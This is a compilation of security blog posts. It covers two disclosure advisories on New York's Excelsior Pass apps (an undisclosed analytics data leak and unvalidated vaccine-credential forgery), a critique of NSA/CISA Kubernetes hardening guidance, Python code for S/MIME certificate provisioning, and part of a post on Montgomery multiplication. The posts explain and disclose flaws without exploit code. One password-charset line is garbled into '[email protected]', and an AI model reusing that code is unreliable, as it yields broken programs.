Technical Advisory – New York State Excelsior Pass Vaccine Passport Scanner App Sends Data to a Third Party not Specified in Privacy Policy

1 September 2021 at 19:00
Vendor: New York State
Vendor URL: https://covid19vaccine.health.ny.gov/excelsior-pass
Versions affected: iOS 1.4.1, Android 1.4.1
Systems Affected: iOS, Android
Author: Dan Hastings dan.hastings[at]nccgroup[dot]trust
Advisory URL / CVE Identifier:
Risk: Information Leakage

Summary

The New York State (NYS) Excelsior scanner app is used by businesses or event venues to scan the QR codes contained in the NYS Excelsior wallet app to verify that an individual has either a negative COVID-19 test or their vaccination status. We have found that some data about the businesses/event venues using the app to scan QR codes is also sent to a third-party analytics domain, but that this was not specified in the app’s privacy policy.

Impact

The NYS scanner app’s privacy policy does not match up to the actual data collection practices of the application, resulting in data being sent to an analytics third party that was not specified in advance to users of this app.

Details

The NYS Excelsior scanner privacy policy (https://epass.ny.gov/privacy-scanner) describes that the Business Name, Industry Type and Zip Code are all collected by the scanner app. The policy also states in the “How Data is Used” clause that “App data, , including Business Name, Industry Type, Zip Code, Pass type (vaccination, PCR, antigen), and Scan Result (valid, invalid, expired, pass not found), is collected and stored securely and is only shared with NYS”. 

In a request to the domain https://app-measurement.com (which is used for Google Analytics) the Business Name, Industry Type and Zip Code of the business/event venue using the scanner are all sent, which was not specified in the app’s privacy policy.

Fix from Vendor

Vendor informed NCC Group that updates will be made to the privacy policy to clarify that Business Name, Industry Type and Zip Code data will be shared with third parties.

Recommendation to Scanner App Users

Update to the latest version of the application.

Vendor Communication

2021-04-30 Starts disclosure to NYS via support form - no response
2021-06-07 Submits another request to coordinate a disclosure - no response
2021-06-10 Calls NYS Excelsior support and is instructed to wait or contact the Department of Health 
2021-06-17 Emails DOH requesting to start disclosure process - no response
2021-06-25 Emails DOH to follow up on previous email - no response
2021-07-08 Emails DOH and requests acknowledgment - no response 
2021-07-16 Emails NYS ITS Cyber command center requesting to start a disclosure 
2021-07-20 ITS sets up meeting to discuss vulnerability’s
2021-07-21 Meets with ITS team and shares vulnerabilities and recommends fixes
2021-07-21 ITS sends email with patch details and date 
2021-08-12 Patch released
2021-09-01 Advisory publication 

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date: 2021-09-01

Written by: Dan Hastings

Technical Advisory – New York State Excelsior Pass Vaccine Passport Credential Forgery

1 September 2021 at 19:00
Vendor: New York State
Vendor URL: https://play.google.com/store/apps/details?id=gov.ny.its.healthpassport.wallet
Versions affected: 1.2.0
Systems Affected: Android Google Play Store
Author: Siddarth Adukia sid.adukia[at]nccgroup[dot]com

Summary

New York State developed an application called NYS Excelsior Pass Wallet that allows users to acquire and store a COVID-19 vaccine credential. During some research it was discovered that this application does not validate vaccine credentials added to it, allowing forged credentials to be stored by users.

Impact

This issue would allow an individual to create and store fake vaccine credentials in their NYS Excelsior
Pass Wallet that might allow them to gain access to physical spaces (such as businesses and event venues) where they would not be allowed without a vaccine credential, even when they have not received a COVID-19 vaccine.

Details

The Wallet application can add a pass directly by interacting with the NYS servers, or through scanning a QR code or photo. In neither case is the credential verified, allowing forged credentials to be added to the Wallet. Screenshots of forged credentials are included; these may be scanned by the Wallet app and added as a legitimate pass.

If a business does not properly use the NYS Scanner application, or ignores the invalid pass warning in the Scanner app and trusts the pass shown in the Excelsior Wallet app on a user’s smartphone, it could allow individuals to fake vaccine credentials and gain access to physical spaces that are only supposed to be accessible to those with valid, legitimate proof of vaccination.

Fix from Vendor

Vendor informed NCC Group they intend to implement verification for vaccine credentials added to the NYS Excelsior Pass Wallet. This fix was released in the August 20 2021 version of the app.

Recommendation to Users

Update to the latest version of the application.

Users of he NYS Excelsior Pass Scanner (such as businesses and event venues) should take care while scanning presented vaccine credentials to confirm that each presented credential is successfully validated by the Scanner application to ensure that a presented credential is legitimate.

Vendor Communication

2021-04-30 NCC Group starts disclosure to NYS via support form - no response
2021-06-07 NCC Group submits another request to coordinate a disclosure - no response
2021-06-10 NCC Group calls NYS Excelsior support and is instructed to wait or contact the Department of Health 
2021-06-17 NCC Group emails DOH requesting to start disclosure process - no response
2021-06-25 NCC Group emails DOH to follow up on previous email - no response
2021-07-08 NCC Group emails DOH and requests acknowledgment - no response 
2021-07-16 NCC Group emails NYS ITS Cyber command center requesting to start a disclosure 
2021-07-20 NYS ITS sets up meeting to discuss vulnerabilities
2021-07-21 NCC Group meets with NYS ITS team and shares vulnerabilities and recommends fixes
2021-07-21 NYS ITS sends email with patch details and date 
2021-08-20 Patch released
2021-09-01 Advisory published

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date:  2021-09-01

Written by:  Siddarth Adukia

[Editor’s note: The disclosure timeline on this post was updated September 2 2021 to correct the patch date which was incorrectly noted in the original post. This was also corrected in the “Fix from Vendor” section. The issue was patched on August 20 2021; the original advisory had stated that it was August 12 2021]

NSA & CISA Kubernetes Security Guidance – A Critical Review

9 September 2021 at 15:08

Last month, the United States’ National Security Agency (NSA) and Cybersecurity and Infrastructure Security Agency (CISA) released a Cybersecurity Technical Report (CTR) detailing the security hardening they recommend be applied to Kubernetes clusters, which is available here. The guidance the document contains is generally reasonable, but there are several points which are either incorrect or do not provide sufficient context for administrators to make good security-focused decisions.

In this blog post, we begin by outlining the general guidance (“The Good“), and then highlight some points where the CTR is either misleading or incorrect (“The Bad” and “The Complex“). This post is split into three parts:

  1. The Good
  2. The Bad: Places where the NSA/CISA guidance overlooked important aspects of Kubernetes security, or where the guidance was out of date at time of publication.
  3. The Complex: Considerations for some of the more common complex use cases not covered by the CTR guidance, including useful audit configurations that won’t require excessive levels of compute power or storage, handling external dependencies, and some notes around the complex mechanisms of Kubernetes RBAC.

The Good

On the whole, the guidance provided is sensible and will help administrators bring their clusters to a reasonable and secure state.

The high level guidance from the document is as below:

  • Scan containers and Pods for vulnerabilities or misconfigurations
  • Run containers and Pods with the least privileges possible
  • Use network separation to control the amount of damage a compromise can cause
  • Use firewalls to limit unneeded network connectivity and encryption to protect confidentiality
  • Use strong authentication and authorization to limit user and administrator access as well as to limit the attack surface
  • Use log auditing so that administrators can monitor activity and be alerted to potential malicious activity
  • Periodically review all Kubernetes settings and use vulnerability scans to help ensure risks are appropriately accounted for and security patches are applied

Each of these points relate back to the generic guidance for almost any platform, regardless of the technology in use: restrict access through authentication and network filtering, log what is permitted and what gets requested, apply security options where available, and keep components up to date.

The guidance also calls out the common sources of compromise, identifying supply chain attacks, malicious threat actors, and insider threats. Despite “malicious threat actors” covering a fairly broad scope as an answer to “who wants to hack us?”, these three sources of compromise cover the majority of the attack paths we have followed when reviewing customer environments.

High Level Recommendations

Scan Container Images

Vulnerability scanning is a key component of staying secure, regardless of the platform used. Performing image scanning on your images can be a good way to prevent the software you are running from becoming open to newly identified vulnerabilities.

Patching container images generally needs to happen in two stages: downloading fresh versions of the published image from a vendor, and applying any patches which have been released since the image was last built through a package manager like apt or yum. As with patching of any other system, care should be taken to ensure that all of your software still works as intended after any patches have been applied. You should also make sure all images are pulled from trusted sources (such as official Docker images, or images from verified publishers). Additionally, any programming language based dependencies (Ruby/Bundler, Python/Pip etc.) should be updated regularly.

Follow the Principle of Least Privilege

Running containers with the lowest level of privileges possible will help to reduce the blast radius of a compromise, reducing what an attacker is able to do should they gain access to a single pod through a remote code execution (RCE) vulnerability in a microservice or similar. This can be accomplished in a few ways, the simplest of which is to build container images to run as a non-root user.

Kubernetes can also force a container to run as a specific user through the use of the SecurityContext directive. This approach is effective, but may result in file permission problems in images which expect to be run as UID 0.

The NSA/CISA guidance does also mention the possibility to use a rootless Docker engine. While this can work for a standalone Docker instance, support is not widely available for running a rootless engine in Kubernetes and doing so is generally not advised on production systems.

Another option is to use user namespacing, effectively allowing contained processes to run “as root” inside but mapping to a non-0 UID on the host. This feature is supported on Docker, but is only in alpha levels of support in Kubernetes.

The concepts applied to running pods should also be applied to anywhere authentication and authorization are applied, such as Kubernetes RBAC and service account configurations. Service accounts have permissions which are effectively granted to any running pod configured to use that account. These permissions are rarely required for standard applications, and so most service accounts do not need any permissions at all.

Isolate Networks

Suggesting enforcing isolation between components is common security advice. Recommending the use of both host/network firewalling and Kubernetes network policies to provide this isolation is good advice, and something that we generally don’t see enough of on customer engagements. It’s not uncommon for us to see environments where the Kubernetes apiserver is exposed to the internet, and for the cluster itself to be completely flat. This means any compromise of one service can provide an attacker with a path to other services, some of which may be running without authentication requirements.

As a minimum we recommend isolating namespaces through the use of a default deny-all network policy for both ingress and egress, then only permitting the connections that are explicitly required. For more sensitive environments we often see customers choose to use a service mesh such as Istio or Linkerd to provide further filtering and additional encryption, however these options do tend to increase operational complexity significantly (and aren’t without their own security issues).

Logging Configuration

Like with network isolation, we regularly see customer deployments running without any logging or auditing enabled. Enabling these features will massively help to identify ongoing attacks should your cluster be targeted, as well as providing essential forensic information should the worst happen and the cluster be compromised by a malicious user.

Regular Configuration Review

Kubernetes clusters require ongoing maintenance, and are not systems which can be simply set-and-forget. Between the relentless patching cycle and an increasing number of security releases and bugfixes and changes to API versions, regular config changes will be required. Checking that security options are applied correctly or tweaking configurations to improve the security posture over time is expected as part of routine maintenance.

As discussed extensively in the released document, Kubernetes clusters are rarely configured securely out of the box. For organisations running multiple clusters, having a standardised deployment process with known-secure options applied will help you ensure consistency.

The Bad

Some of the advice contained in the CTR was not as accurate or up-to-date as guidance from other sources. While not necessarily bad advice, some of the core concepts in Kubernetes security are not discussed in the document, or are not given the attention they deserve.

PSP Deprecation

The biggest issue I have with the guidance is the over-reliance on Pod Security Policy (PSP) as a solution for a range of problems. When first released, PSP was the only available control to prevent a user with the ability to create pods from compromising an entire node in a trivial manner. The guidance correctly points out the many features of PSP, but it does not call out that the PSP feature is officially deprecated, and will be removed in the 1.25 release. This may be because the authors did not want to recommend a specific third party alternative, and the official replacement was only recently formalised.

Several technologies have appeared over the last few years which have aimed to fix holes in the PSP model, including OPA Gatekeeper, Kyverno, and k-rail. The official replacement to PSP, a newly introduced alpha feature called PodSecurity, will be added in Kubernetes 1.22 when it releases later this year.

The deprecation of PSP has only been a matter of time, and our advice for some time now has been to implement one of the PSP replacements rather than spend large amounts of engineering time on a feature that will be removed in the next year. Until the PodSecurity admission controller is more mature, this is still our recommendation to customers.

Admission Controllers

Pod Security Policy, and each of the alternatives, is implemented as an admission controller in a Kubernetes cluster. Admissions controllers are an “extra” step, required for approval after a request has passed authentication and authorization checks. These controllers can provide a vast amount of security hardening in an automated manner. Despite this, they were only mentioned in the released guidance once, as part of the image scanning section.

A well-configured admission controller can automatically enforce a significant number of the checks around pod security, for instance by blocking pods which attempt to run with the privileged flag, or programmatically adding the “RunAsUser” field to force every pod to run as a non-root user.

Inconsistencies/Incorrect Information

The CTR did contain a couple of inconsistencies, or pieces of information which were not correct. For example, page 4 of the guidance states that both the Kubelet and the Scheduler run on TCP 10251 by default. In actuality the Kubelet’s default port is TCP port 10250 for the read-write port, and 10255 for the soon-to-be-deprecated read-only port. Page 15 does provide the correct information for the Kubelet’s read-write port, but does not make any mention of the read-only port. Similarly, the kube-scheduler component runs on TCP port 10259, not 10251, in modern installs, and the controller-manager runs on 10257.

Kubernetes also has an insecure API mode, which the CTR correctly identifies as bypassing all AuthN/AuthZ checks and not using TLS encryption. However, this insecure port was deprecated in version 1.20. Since this release, the –insecure-port flag is only accepted as a parameter if the value is set to 0. If you are running a cluster and have the insecure port enabled, access should be extremely locked down and well monitored/audited, but in general there is no reason this port should be enabled in a modern cluster.

Authentication Issues

When it comes to authentication, the CTR is largely incorrect when it states that Kubernetes does not provide an authentication method by default. While the specifics will vary from install to install, the majority of clusters we review support both token and certificate authentication, both of which are supported natively. While these are supported, we generally advise against using either for production workloads as each have their downsides. In particular, client certificate authentication can provide issues when it comes removing access should it be required to cut off a cluster administrator, as Kubernetes does not support certificate revocation. This becomes more of an issue if an attacker managed to gain access to a certificate issued to the group system:masters, as this group has hard-coded administrative access to the apiserver.

The Complex

With a project as complicated as Kubernetes, it is not possible to cover every option and every edge case in a single document, so trying to write a piece of one size fits all guidance won’t be possible. Here, I would like to offer considerations for some of the more common complex use cases not covered by the CTR guidance. This includes coming up with a useful audit configuration that won’t require excessive levels of compute power or storage, handling external dependencies, and some notes around the complex mechanisms of Kubernetes RBAC.

Levels of Audit Data

While enabling auditing is an excellent idea for a cluster, Kubernetes is heavily reliant on control loops that constantly generate HTTP requests. Logging of every request, and particularly logging the request and response data as suggested in Appendix L of the released guidance, would result in massive amounts of data being stored with the vast majority of this information being expected and not of much use for forensics or debugging. Similarly, the guidance explicitly suggests logging for all pod creation requests, which will result in a large amount of data being stored by routine actions such as pods scaling or being moved from one node to another by a scheduler. Instead of logging full requests, we recommend writing a tailored policy which includes metadata for most requests, and only storing full request/response information for particularly sensitive calls. The exact logging requirements will vary from deployment to deployment in line with your security standards but, in general, logging everything is not considered essential, and can have adverse effects on storage requirements and processing time. In some cases, it can drastically increase operational costs if logs are ingested to a cloud service or a managed service which charges per log-entry.

Sidecar Resource Requirements

Similarly, the CTR advises that logging can be performed in a number of ways. This is true, and again the option you choose will depend on your specific setup. However, logging sidecars on every container does come with an increase in deployment complexity and a significant increase in resource requirements per pod.

Again, there is no “correct” logging deployment, and each option will have pros and cons. That said, it may be more efficient to have containers log to a specific directory on each node and use either a daemonset or some component of the host configuration to pick up these logs and pass them to a centralised logging location.

External Dependencies are essential

The core of a Kubernetes cluster is comprised of container images, which are generally pulled from an external source. For example the apiserver is generally retrieved from k8s.gcr.io/kube-apiserver. Even excluding the core components, most cloud-native technologies tend to assume they’re being run in a highly connected environment where updates can be retrieved in a trivial manner.

Most Kubernetes clusters can be reconfigured to require only local images, but if you decide to enable such restrictions, performing updates will become much more difficult. Given the update cadence of Kubernetes, increasing upgrade friction may not be something you want, leading to the old tradeoff of usability vs security. On the other hand, always pulling the latest version of an external dependency without performing any validation and security testing may open an organisation to supply-chain compromise. The likelihood of this varies, as some repositories will be better monitored and are less likely to be compromised in the first place, but it’s still something to consider.

Container signing is still very much not a solved problem. Historically, Docker Content Trust was viewed as the best option where it was enabled, but that mechanism was not without its problems and is no longer maintained. Several solutions are being worked on, including sigstore.

As well as verifying that your external dependencies are legitimate and not altered from the original packages, these containers may contain security vulnerabilities. At time of writing, the image k8s.gcr.io/etcd:3.5.0-0 (the newest version packed for Kubernetes) has packages vulnerable to CVE-2020-29652 which shows as a high risk vulnerability when scanned with an image scanner like Trivy or Clair. Again, you could probably take on the task of patching these images but that leads to further problems: Do you want to be responsible for performing all testing that patching will require, and what will you do when images contain vulnerabilities for which no patch exists?

RBAC is hard

Kubernetes RBAC is a difficult thing to configure well, and on engagements we regularly see customers who have an RBAC configuration allowing users or attackers to escalate their permissions, often to the point of gaining full adminsitrative control over the cluster. Plenty of guidance is available on the internet around how to do Kubernetes RBAC securely, and that goes way beyond the scope of this post.

Patching Everything is hard

This post has already discussed the difficulties of keeping everything published in containers, but patching of the worker nodes themselves is equally important. Unless you’re running a cluster backed by something like AWS’ Fargate, containers are still running on a computer that you need to keep updated. Vulnerabilities have historically been identified in every step of the execution chain, from Kubernetes to Containerd to runc and the Linux kernel. Keeping all of these components updated can be challenging, especially as there’s always the chance of breaking changes and requirements for downtime.

This is something that Kubernetes can help with, as the whole concept of orchestration is intended to keep services running even as nodes go on and offline. Despite this, we still regularly see customers running nodes that haven’t had patches applied in several months, or even years. (As a tip, server uptime isn’t a badge of honour as much as it used to be; it’s more likely indicative that you’re running an outdated kernel).

Closing Thoughts

The advice issued in this NSA/CISA document has a solid technical grounding and should generally be followed, but some aspects are outdated or are missing some key context. This is almost always the case with anything in Kubernetes given the rapid development pace at which the project is still working. As with any technical security guidance, documents such as this CTR should be taken as guidance and reviewed with suitable levels of business/security context, because when it comes to container security, one size definitely does not fit all.

CertPortal: Building Self-Service Secure S/MIME Provisioning Portal

10 September 2021 at 06:48

tl;dr

NCC Group’s Research & Development team designed and built CertPortal which allows users to create and manage S/MIME certificates automating the registration and renewal to allow enterprise scale deployment.

The core of the system integrates DigiCert to create an S/MIME certificate and then storing both the certificate, the password, creation and expiry dates in a CyberArk safe. It then publishes the public certificate in the Microsoft Exchange Global Address List against the user’s account.

The portal presents the user with the two options of ‘show me my password’ and ‘download certificate’. This approach has removed a number of manual processes whilst providing significant efficiency and security gains.

The Beginning

Encryption as standard is both a crowning jewel and a backbone of modern HTTP traffic, so much so that browsers warn users of websites that do not offer it. On top of that, services like Let’s Encrypt make the process of adding encryption to a public facing website easy.

In the world of S/MIME this is not the case. There are services such as DigiCert or Entrust which allow API users to automatically generate S/MIME certificates but this still leaves a large earnest on the IT team to run the scripts to generate a password and private key, request a certificate, then securely deliver all of the above to the end user.

In steps CertPortal, an S/MIME self-service portal to fill this void. It needs to be able to do three things well:

  1. On request generate a password, private key, and CSR, request a certificate, and generate a PFX file.
  2. Securely store those files and retrieve them on request.
  3. Provide a simple-to-use interface for users to perform the first two things.

In this post we will be discussing the first thing: Generating an S/MIME certificate.

Passwords, Private Keys, and CSRs

Assuming we have received a request to generate an S/MIME certificate the first thing we need to do is prepare ourselves to request a certificate from our Certificate Authority. This requires us to create a cryptographically secure password, a private key, and a Certificate Signing Request (CSR).

Secure Passwords

The first step is to generate a secure password, fortunately for us since Python 3.6 the secrets module has been available which makes this process fairly straight forward. We want our script to be repeatable so we will store our generated password on local disk so if we have a failure later on in the pipeline we can easily restart the process to try again.

This means we need to check our storage directory for an existing password file and return the contents if found. Otherwise we need to generate a cryptographically secure password, store it in the storage directory, and return the newly generated password.

import os
import secrets

PWD_CHRS = "[email protected]#$%^&*-+=,."
PWD_LEN = 16


def get_password(storage_dir: str) -> bytes:
    pwd_file = os.path.join(storage_dir, 'password.txt')
    try:
        with open(pwd_file, 'rb') as f:
            password = f.read()
    except FileNotFoundError:
        list_rand_chrs = [secrets.choice(PWD_CHRS) for _ in range(PWD_LEN)]
        password_str = ''.join(list_rand_chrs)
        password = password_str.encode('utf-8')
        with open(pwd_file, 'wb') as f:
            f.write(password)

    return password

The interesting line from the above excerpt is generating the password. Choosing the password characters and length is a matter for your own security policies. There are three steps to generating the password:

  1. Generate a list of random characters: secrets.choice(PWD_CHRS) for _ in range(PWD_LEN)
  2. Convert the list into a string ''.join(list_rand_chrs).encode('utf-8')
  3. Convert the list into its bytes representation: ''.join(list_rand_chrs).encode('utf-8')

Private Keys

Once we have a password the next step is to generate a private key. To achieve this we will use the cryptography package. Like the previous step we want this step to be robust and repeatable.

This means we need to check our storage directory for an existing private key file, loading it using the password, and return it. Otherwise we generate a new private key with the password, store it in the storage directory, and return the private key.

import os

from cryptography.hazmat.primitives.serialization import load_pem_private_key
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization

KEY_SIZE = 4096


def get_private_key(storage_dir: str, password: bytes):
    key_file = os.path.join(storage_dir, 'private.key')
    try:
        with open(key_file, 'rb') as f:
            key = load_pem_private_key(
                f.read(), password, default_backend())
    except (ValueError, FileNotFoundError):
        key = rsa.generate_private_key(
            public_exponent=65537,
            backend=default_backend(),
            key_size=KEY_SIZE)

        with open(key_file, 'wb') as f:
            f.write(key.private_bytes(
                encoding=serialization.Encoding.PEM,
                format=serialization.PrivateFormat.TraditionalOpenSSL,
                encryption_algorithm=serialization.BestAvailableEncryption(password)))

    return key

This process is fairly straight forward when you know what you’re doing. The important part is choosing the key size which needs to be a power of 2 (at least 2048).

Certificate Signing Requests

The last part of this step is creating the Certificate Signing Request (CSR). To achieve this simply follow the tutorial provided by the cryptography package with a couple of minor amendments:

csr = x509.CertificateSigningRequestBuilder().subject_name(x509.Name([
    # Provide various details about who we are
    x509.NameAttribute(NameOID.COMMON_NAME, csr_attrs['common_name']),
    x509.NameAttribute(NameOID.COUNTRY_NAME, csr_attrs['country_name']),
    x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, csr_attrs['state_name']),
    x509.NameAttribute(NameOID.LOCALITY_NAME, csr_attrs['locality_name']),
    x509.NameAttribute(NameOID.ORGANIZATION_NAME, csr_attrs['organization_name']),
    x509.NameAttribute(NameOID.ORGANIZATIONAL_UNIT_NAME, csr_attrs['organization_unit_name']),
])
).add_extension(x509.SubjectAlternativeName([
    x509.DNSName(csr_attrs['common_name'])
]), critical=False
).sign(key, hashes.SHA512(), cryptography_default_backend())

We need to set the ‘Common Name’ and subject ‘Alternative Name’ as the email address the S/MIME is being generated for. There is no need to check the storage directory for an existing CSR as, unlike the password and private key, the CSR will be the same every time (if we use the same private key).

Asking the Certificate Authority

Now that we have a password, private key, and CSR we can move onto asking the Certificate Authority (CA) for an S/MIME certificate. This step will vary depending on which provider we are going to use but the basic process is the same for all:

  1. Authenticate with their API
  2. Request a new S/MIME type certificate from their API
  3. Store the request ID returned for future reference
  4. Waiting until the S/MIME certificate has been issued
  5. Download the certificate (including all chain certificates)
  6. Store the certificates in the same storage directory as the password, private key, and CSR

Bundle into a PFX (PKCS12) file

Lastly, we need to bundle the private key, S/MIME certificate, and chain certificates into a PFX (PKCS12) file for our end user to be able to download via the portal. To do this we will require one more Python package: OpenSSL (note that the cryptography package has since added PKCS12 serialization since version 3, however CertPortal currently uses version 2). Like the CSR, the process here is straightforward when you know what you are doing:

from OpenSSL import crypto


def get_pfx(storage_dir: str, cert, chain: list, key, password: bytes, friendly_name: bytes = None):
    """
    Generate a PFX (PKCS12) from the certificate(s), key, and password then store it in a file
    called `smime.pfx` inside `storage_dir`.
    :param storage_dir: Directory to store the PFX file
    :param cert: cryptography S/MIME certificate
    :param chain: List of cryptography chain certificates issued by the CA
    :param key: The cryptography private key
    :param password: The private key password
    :param friendly_name: The friendly name in the PKCS #12 structure
    """
    pfx = crypto.PKCS12()
    pfx.set_friendlyname(friendly_name or b'S/MIME Certificate')
    pfx.set_privatekey(crypto.PKey.from_cryptography_key(key))
    pfx.set_certificate(crypto.X509.from_cryptography(cert))
    pfx.set_ca_certificates([crypto.X509.from_cryptography(c) for c in chain])
    pfx_data = pfx.export(password)

    with open(os.path.join(storage_dir, certificate_file_name('pfx')), 'wb') as f:
        f.write(pfx_data)

    return pfx

We start by creating a crypto.PKCS12 object and setting a friendly name for the certificate. Next we set the private key. Then we set the S/MIME certificate (after converting from the cryptography key) and the same for the CA certificates. Finally we export the data and store it in the storage directory.

Conclusion

At the end of this process we have a secure password, private key, CSR, and PFX ready to be downloaded by the end user. We still need to be able to securely store these files and provide an interface for an end user to generate a new certificate and access existing certificates. We will address the secure storage in a future post.

We hope that this post has given you a good understanding of the how to create an S/MIME certificate progamtically.

Final remarks

We have only looked at the bare bones of this process and as such skipped over many best practices such as storing the configurations, using interfaces and implementing CA specific backends, etc. These are, however, outside the scope of the post.

Optimizing Pairing-Based Cryptography: Montgomery Multiplication in Assembly

10 September 2021 at 08:30

This is the second blog post in a new code-centric series about selected optimizations found in pairing-based cryptography. Pairing operations are foundational to the BLS Signatures central to Ethereum 2.0, the zero-knowledge arguments underpinning Filecoin, and a wide variety of other emerging applications.

While my prior blog series, “Pairing over BLS12-381,” implemented the entire pairing operation from start to finish in roughly 200 lines of high-level Haskell, this current blog series, “Optimizing Pairing-Based Cryptography” looks at lower-level performance optimizations in more operational systems. The first post in this series covered modular Montgomery arithmetic in Rust from start to finish. This second post takes the Montgomery multiplication algorithm developed in Rust even further to seek the maximum performance a modern x86-64 machine can deliver from an implementation hand-written in assembly language. Several specialized instructions and advanced micro-architectural features enabling increased parallelism result in a Montgomery multiplication routine running more than 15X faster than a generic Big Integer implementation.

Overview

Pairing-based cryptography is fascinating because it utilizes such a wide variety of concepts, algorithms, techniques and optimizations. For reference, the big picture on pairing can be reviewed in the prior series of blog posts listed below.

Pairing over BLS12-381, Part 1: Fields
Pairing over BLS12-381, Part 2: Curves
Pairing over BLS12-381, Part 3: Pairing!

This current blog post focuses on optimizing the most expensive of basic field arithmetic operations: modular multiplication. First, a reference function implemented in Rust with the BigUint library crate is presented alongside a similar reference function adapted for use with Montgomery-form operands. Second, a more optimized routine utilizing operands constructed solely from 64-bit unsigned integers and developed in the prior blog post is presented – this serves as the jumping-off point for assembly language optimization. Third, the complete assembly routine is developed and described with interspersed insights on CPU architecture, micro-architecture, and register allocation. This post then wraps up with some figure of-merit benchmarking results that compare the various implementations.

All of the code is available, ready-to-run and ready-to-modify for your own experimentation. The code is nicely self-contained and understandable, with zero functional dependencies and minimal test/build complexity. On Ubuntu 20.04 with Rust, git and clang preinstalled, it is as simple as:

$ git clone https://github.com/nccgroup/pairing.git
$ cd pairing/mont2
$ RUSTFLAGS="--emit asm -C target-cpu=native" cargo bench

The Reference Operations

Rust, along with the BigUint library crate, makes the basic modular multiplication operation exceptionally easy to code. The excerpt below defines the BLS12-381 prime field modulus with the lazy_static macro and then proceeds to implement the modular multiplication function mul_biguint() using that fixed modulus. This reference function corresponds to the modular multiplication performance a generic application might achieve, and is used later as the benchmark baseline. [Code excerpt on GitHub]

As described in the prior blog post, the Montgomery multiplication algorithm has a lot more potential for performance optimization but uses operands in the Montgomery form ã = a · R mod N, where a is the normal value (or normal form), N is the MODULUS and R is 2384 in our scenario. When operands in Montgomery form are multiplied together, an instance of R−1 needs to be factored into the calculation in order to maintain the result in correct Montgomery form. Thus, the actual operation is mont_mul(ã, b̃) = ã · b̃ · R−1 mod N. The code below declares the R−1 = R_INV constant as calculated in the prior blog post, utilizes the same MODULUS constant declared above, and so implements our mont_mul_biguint() Montgomery multiplication reference function. [Code excerpt on GitHub]

Note that the above function currently has even worse performance characteristics than the prior baseline. This is due to the additional multiplication involving R_INV delivering an even larger input to the very expensive modular reduction operator which involves a division operation. However, it can serve as a more formalized definition of correct functionality, so it will be used internally to support the test code which compares actual versus expected results across different implementations. As an aside, recall that the extra expense of converting the operands to/from Montgomery form is expected to be amortized across many (hopefully now much faster) interim operations.

Montgomery Multiplication Using Rust’s Built-In Types

The primary issue with each of the above multiplication routines is the expensive division lurking underneath the modulo operator. The BigUint crate is wonderful in that it supports both arbitrary precision operands and moduli. However, this flexibility precludes some of the aggressive performance optimizations that can be implemented with fixed-size operands and a constant modulus.

The Rust code shown below from the prior blog post introduces the fixed data structure used for the operands. Operands consist of an array of six 64-bit unsigned integers, each known as a limb. This is followed by the ‘magic constant’ N_PRIME derived in the prior blog post for use in the reduction step, and then the complete Montgomery multiplication function using only Rust’s built-in operators and data types. [Code excerpt on GitHub]

There are three interesting and related things to observe in the code above.

  1. A temp array is declared on line 107 that is capable of holding twelve 64-bit limbs. Intuitively, that size makes sense since the overall operation involves a multiplication of two operands, where each operand consists of six 64-bit limbs, so a ‘double-width’ intermediate result is appropriate.
  2. The outer loop wraps a partial product step in the first inner loop followed by a reduction step in the second inner loop, and the outer loop index i always acts as a base address whenever the temp array is accessed. Looking more closely at the logic executed during each outer loop iteration, only seven limbs of the temp array are ever active, which is a noticeably smaller working set relative to the overall size of twelve in the temp declaration.
  3. As the outer loop iterates, the code essentially steps forward through the working set of the temp array from least significant toward most significant limb, never going fully backwards. In fact, incrementing the loop index i and using it as a base address means the least significant values are effectively falling away one at a time; the final result is derived from only the most significant six limbs of the temp array.

These three observations suggest that it is possible to elegantly implement the work done inside the outer loop within only a handful of active registers. The outer loop can then either iterate as shown or be unrolled, while it shifts the working set one step forward through the temp array each time.

An Aside: CPU Architecture, Micro-architecture, and Register Allocation

Some basic foundation needs to be built prior to jumping into the assembly language implementation. While the term ‘CPU Architecture’ does not have a single, simple or perfectly agreed-upon definition, in this context it describes the higher-level software instruction set and programming model of a processor system – the programmer’s view. At a lower level, the term ‘CPU Micro-architecture’ then describes how a specific processor implementation is logically organized to execute that instruction set – these underlying mechanisms are largely hidden from the application programmer. Both areas have seen tremendous progress and greater complexity over time in the never ending quest for performance that largely comes from increased parallelism. There are a few things to observe for each topic, starting from the lower-level and working upwards.

CPU Micro-architecture

A view into the micro-architecture of Intel’s Core2 machine is shown below. While that machine is over a decade old, the diagram remains very instructive and more modern versions have similar structure with greatly increased capacities. The assembly code we soon develop should run well on all modern Intel and AMD x86-64 processors shipped within the past 5 years (at least).

https://commons.wikimedia.org/w/index.php?curid=2541872 CC BY-SA 3.0

There are four interesting things to observe in the diagram above.

  1. The (pink) instruction fetch logic is capable of supplying six instructions from the fetch buffer to the instruction queue per cycle. Clearly the intent is to keep the multiple parallel execution units downstream (described next) stuffed full of work.
  2. The (yellow) execution units are capable of executing multiple similar and dissimilar operations in parallel. The configuration is intended to support many simple and frequent operations separately from the fewer, more complex and rarer operations. The various operations will clearly involve very different throughput and latency characteristics.
  3. The (salmon) reservation station helps manage the operand dependencies between instructions, and the register alias table allows for more physical registers than logical registers. The adjacent reorder buffer and retirement register file logic allows instructions to execute out-of-order but get committed in-order. While humans typically think in a nice orderly step-by-step fashion, the actual instruction execution patterns can go wildly out-of-order (provided they are ultimately finalized in-order).
  4. While the specific individual pipeline stages are not shown, modern processors have very deep pipelines and thus require extensive branch prediction logic to minimize overhead from mispredictions. This is pertinent to unrolling small loops.

The four items above allow the processor to extract a large amount of the underlying instruction-level parallelism throughout each of the fetch, decode, execute and finalize/retire steps. It is quite fantastic that all of this complexity is effectively hidden from the application programmer. A bigger, better and newer micro-architecture should simply result in better performance on strictly unchanged code.

CPU Architecture

